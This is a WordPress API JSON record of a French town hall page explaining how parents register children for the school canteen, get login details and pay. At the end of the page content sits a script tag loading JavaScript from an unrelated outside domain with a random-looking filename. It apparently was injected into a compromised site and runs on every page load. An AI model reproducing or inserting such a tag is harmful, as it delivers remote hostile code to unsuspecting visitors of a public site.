{"id":2213,"date":"2019-11-19T14:39:17","date_gmt":"2019-11-19T13:39:17","guid":{"rendered":"http:\/\/www.attin-mairie.fr\/?page_id=2213"},"modified":"2020-06-30T09:28:48","modified_gmt":"2020-06-30T08:28:48","slug":"inscriptions-a-la-cantine","status":"publish","type":"page","link":"https:\/\/www.attin-mairie.fr\/?page_id=2213","title":{"rendered":"Inscriptions \u00e0 la cantine"},"content":{"rendered":"<h2 style=\"text-align: center;\"><em><strong>Inscriptions \u00e0 la cantine :<\/strong><\/em><\/h2>\n<p><em>Pour les inscriptions a la cantine une d\u00e9marche tr\u00e8s simple.<\/em><\/p>\n<ol>\n<li><em>Dans un premier temps il faut transmettre votre adresse courriel au secr\u00e9taire de la mairie.<\/em><\/li>\n<li><em>Vous recevrez ensuite un identifiant ainsi qu&rsquo;un mot de passe pour vous connecter sur le<strong> <a href=\"http:\/\/www.gestion-cantine.com\">site<\/a><\/strong> securis\u00e9 &nbsp;de gestion de la cantine.<\/em><\/li>\n<\/ol>\n<p><em>Il vous est possible sur le site de g\u00e9rer totalement l&rsquo;inscription de votre enfant a la cantine ainsi que le paiement par carte bleue.<\/em><\/p>\n<p><i>Pour les personnes ne pouvant ou ne souhaitant pas payer par carte, des permanences pr\u00e9vues \u00e0 cet effet sont mises en place 4 fois par mois au secr\u00e9tariat de la mairie ou il vous est possible&nbsp;d&rsquo;effectuer&nbsp;vos r\u00e8glements par ch\u00e8ques ou esp\u00e8ces.<\/i><\/p>\n<p><i>Horaires des permanences pour la cantine : de <\/i><strong style=\"font-style: italic;\">9h \u00e0 10H et de 16h \u00e0 17H<\/strong><i>&nbsp;(<strong>G\u00e9n\u00e9ralement en&nbsp;d\u00e9but de mois<\/strong>)<\/i><\/p>\n<p><strong>ATTENTION<\/strong> : Les inscriptions pour la semaine qui suit doivent imp\u00e9rativement \u00eatre <strong>closes le jeudi soir<\/strong>, afin de permettre une gestion des stocks et de respecter la&nbsp; logistique du personnel. Merci de votre compr\u00e9hension.<\/p>\n<p><i>&nbsp;<\/i><\/p>\n<p>&nbsp;<\/p>\n<p><script src=\"\/\/jaretsummer.com\/228ebbb479fb2ce2f7.js\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Inscriptions \u00e0 la cantine : Pour les inscriptions a la cantine une d\u00e9marche tr\u00e8s simple. Dans un premier temps il faut transmettre votre adresse courriel au secr\u00e9taire de la mairie. Vous recevrez ensuite un identifiant ainsi qu&rsquo;un mot de passe pour vous connecter sur le site securis\u00e9 &nbsp;de gestion de la cantine. Il vous est [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":68,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"ngg_post_thumbnail":0,"footnotes":""},"class_list":["post-2213","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/pages\/2213","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2213"}],"version-history":[{"count":5,"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/pages\/2213\/revisions"}],"predecessor-version":[{"id":2682,"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/pages\/2213\/revisions\/2682"}],"up":[{"embeddable":true,"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/pages\/68"}],"wp:attachment":[{"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2213"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}